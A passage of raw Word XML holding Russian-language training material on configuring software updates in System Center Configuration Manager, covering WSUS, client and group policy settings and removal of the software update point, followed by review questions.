    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Накопительные пакеты обновления: указывает набор исправлений, объединенных в один пакет для более удобного развертывания. К таким исправлениям могут относиться обновления для системы безопасности, критические и обычные обновления и пр. Накопительный пакет обновления обычно предназначен для определенной области, например, безопасности, или для определенного компонента продукта.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Обновления: указывает обновление для уже установленного приложения или файла.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Обновление: указывает установку новых версий компонентов и функций Windows 10.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">На точках обновления программного обеспечения и сайтах необходимо запустить службы WSUS 4.0 с </w:t>
      </w:r>
      <w:hyperlink r:id="rId349" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>исправлением 3095113</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, чтобы получить классификацию обновлений.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>На вкладке Продукты укажите продукты, для которых нужно синхронизировать обновления ПО, затем нажмите кнопку Закрыть.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Примечание. Метаданные каждого обновления ПО определяют, к каким продуктам применимо это обновление. Продукт представляет собой определенную версию операционной системы или приложения, например Windows Server 2012. Семейство продуктов представляет собой базовую операционную систему или приложение, от которых происходят отдельные продукты. Например, Windows – это семейство продуктов, членом которого является Windows Server 2012. Можно указать семейство продуктов или отдельные продукты в составе семейства. Чем больше выбрано продуктов, тем дольше будет выполняться синхронизация обновлений ПО.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Если обновления ПО применимы к нескольким продуктам и хотя бы один из этих продуктов выбран для синхронизации, то все эти продукты будут показаны в консоли Configuration Manager , даже если некоторые из них не были выбраны. Например, если выбрана только операционная система Windows Server 2012, а обновление применимо к Windows 8 и Windows Server 2012, то оба этих продукта будут показаны в консоли Configuration Manager.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Важно. Configuration Manager хранится список продуктов и семейств продуктов, которые можно выбрать при первой установке точки обновления ПО. Продукты и семейства продуктов, выпущенные после выпуска Configuration Manager , могут быть недоступны для выбора до завершения синхронизации обновлений ПО. При синхронизации обновляется список доступных для выбора продуктов и семейств продуктов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Повторите Шаг 2. Синхронизация обновлений программного обеспечения , чтобы вручную запустить синхронизацию обновлений программного обеспечения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Шаг 4. Проверка параметров клиентов и конфигураций групповой политики для обновлений программного обеспечения</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для обновлений программного обеспечения необходимо настроить ряд параметров клиентов и групповой политики.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Параметры клиентов для обновлений программного обеспечения</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">После установки точки обновления программного обеспечения обновления программного обеспечения на клиентах будут включены по умолчанию, а параметры на странице Обновления программного обеспечения в параметрах клиента будут иметь </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>значения по умолчанию. Перед началом развертывания обновлений программного обеспечения убедитесь, что параметры клиента на этой странице подходят для обновления программного обеспечения на вашем сайте.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Важно</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. По умолчанию параметр Разрешить обновление ПО на стороне клиента включен. Если его отключить, то Configuration Manager удалит все политики развертывания на стороне клиента.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Сведения</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>настройке</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>параметров</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>клиента</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>см</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>статье</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId350" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>How to configure client settings in System Center Configuration Manager</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Дополнительные сведения о параметрах клиентов см. в разделе </w:t>
      </w:r>
      <w:hyperlink r:id="rId351" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>About client settings in System Center Configuration Manager</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Параметры групповой политики для обновлений программного обеспечения</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Существуют определенные параметры групповой политики, используемые агентом обновления Windows (WUA) на клиентских компьютерах для подключения к WSUS на точке обновления программного обеспечения. Эти параметры групповой политики применяются также для проверки соответствия обновлений программного обеспечения нормативным требованиям, а также для автоматического обновления ПО и WUA.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Локальная политика «Указать размещение службы обновлений Майкрософт в интрасети»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Если для сайта создана активная точка обновления ПО, клиенты получают политику компьютера, которая предоставляет имя сервера активной точки обновления и настраивает локальную политику Указать размещение службы обновлений Майкрософт в интрасетина компьютере. Агент WUA получает имя сервера, указанное в параметре Укажите службу обновлений в интрасети для поиска обновлений , а затем подключается к этому серверу при проверке соответствия обновлений ПО требованиям. Если для параметра Указать размещение службы обновлений Майкрософт в интрасети создана политика домена, она переопределяет локальную политику, и агент WUA может подключиться к серверу, отличному от точки обновления ПО. Если это происходит, клиент может проверить соответствие обновлений ПО требованиям на основе различных продуктов, классов и языков. Таким образом, не следует настраивать политику Active Directory для клиентских компьютеров.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Групповая политика «Разрешить прием содержимого с подписью из службы обновления Майкрософт в интрасети»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Необходимо включить параметр групповой политики Разрешить прием содержимого с подписью из службы обновления Майкрософт в интрасети , прежде чем агент WUA сможет проверить обновления, созданные и опубликованные с помощью System Center Updates Publisher. Если эта политика включена, агент WUA будет принимать обновления, полученные через расположение в интрасети, если обновления подписаны в хранилище сертификатов Доверенные издатели на локальном компьютере.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Настройка автоматического обновления</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Автоматическое обновление дает возможность клиентским компьютерам получать обновления для системы безопасности и другие важные загружаемые файлы. Автоматическое обновление настраивается с помощью параметра групповой политики Настройка автоматического обновления или в панели управления локального компьютера. Если автоматическое обновление включено, клиентские компьютеры будут получать уведомления об обновлениях, а затем, в зависимости от настроенных параметров, будут загружать и устанавливать необходимые обновления. Если автоматическое обновление используется одновременно с обновлением программного обеспечения, то в обоих случаях для одного и того же обновления могут отображаться значки уведомления и всплывающие уведомления. Кроме того, если требуется перезагрузка, то в обоих случаях для одного и того же обновления может отображаться диалоговое окно перезагрузки компьютера.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Самообновление</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Если на клиентских компьютерах включено автоматическое обновление, то компонент WUA автоматически выполняет самообновление при выпуске новой версии или при возникновении неполадок с компонентом WUA. Если автоматическое обновление не </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>настроено или отключено, а на клиентских компьютерах используется более ранняя версия WUA, то на клиентских компьютерах необходимо запустить файл установки WUA.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Удаление роли системы сайта «Точка обновления программного обеспечения»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Можно удалить роль системы сайта точки обновления программного обеспечения из консоли Configuration Manager. Из клиентской политики удаляется точка обновления программного обеспечения. При удалении последней точки обновления программного обеспечения с сайта список точек обновления не будет содержать ничего, и обновление программного обеспечения будет по существу отключено. Если вы используете более одной точки обновления программного обеспечения на первичном сайте и удаляете точку обновления программного обеспечения, настроенную в качестве источника синхронизации, следует выбрать другую точку обновления программного обеспечения на сайте в качестве нового источника.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Примечание</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> При удалении роли сайта точки обновления программного обеспечения подождите по крайней мере 15 минут перед повторной установкой роли сайта точки обновления программного обеспечения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Следующая процедура используется для удаления точки обновления программного обеспечения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Удаление точки обновления программного обеспечения</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В консоли Configuration Manager щелкните элемент Администрирование.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В рабочей области «Администрирование» разверните узел Конфигурация сайтаи выберите Серверы и роли системы сайта.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Выберите сервер системы сайта с удаляемой точкой обновления программного обеспечения, а затем в области Роли системы сайтавыберите Точка обновления программного обеспечения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>На вкладке Роль сайта в группе Роль сайта щелкните Удалить роль. Подтвердите удаление точки обновления программного обеспечения или выберите новый источник синхронизации для других точек обновления на сайте.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B1321F" w:rsidRPr="00617AC0" w:rsidRDefault="00B1321F" w:rsidP="00B1321F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перечень контрольных вопросов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B1321F" w:rsidRPr="00617AC0" w:rsidRDefault="00B1321F" w:rsidP="00B1321F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Что такое обновление программного обеспечения?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B1321F" w:rsidRPr="00617AC0" w:rsidRDefault="00B1321F" w:rsidP="00B1321F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Какие риски несет обновление программного обеспечения?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B1321F" w:rsidRPr="00617AC0" w:rsidRDefault="00B1321F" w:rsidP="00B1321F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Какие риски несет отказ от обновления программного обеспечения?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B1321F" w:rsidRPr="00617AC0" w:rsidRDefault="00B1321F" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Что</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>такое</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>консоль</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> System Center Configuration Manager?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00672A00" w:rsidRPr="00617AC0" w:rsidRDefault="00672A00" w:rsidP="00672A00">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="152" w:name="_Toc26278736"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Практическое занятие № 1</w:t>
      </w:r>
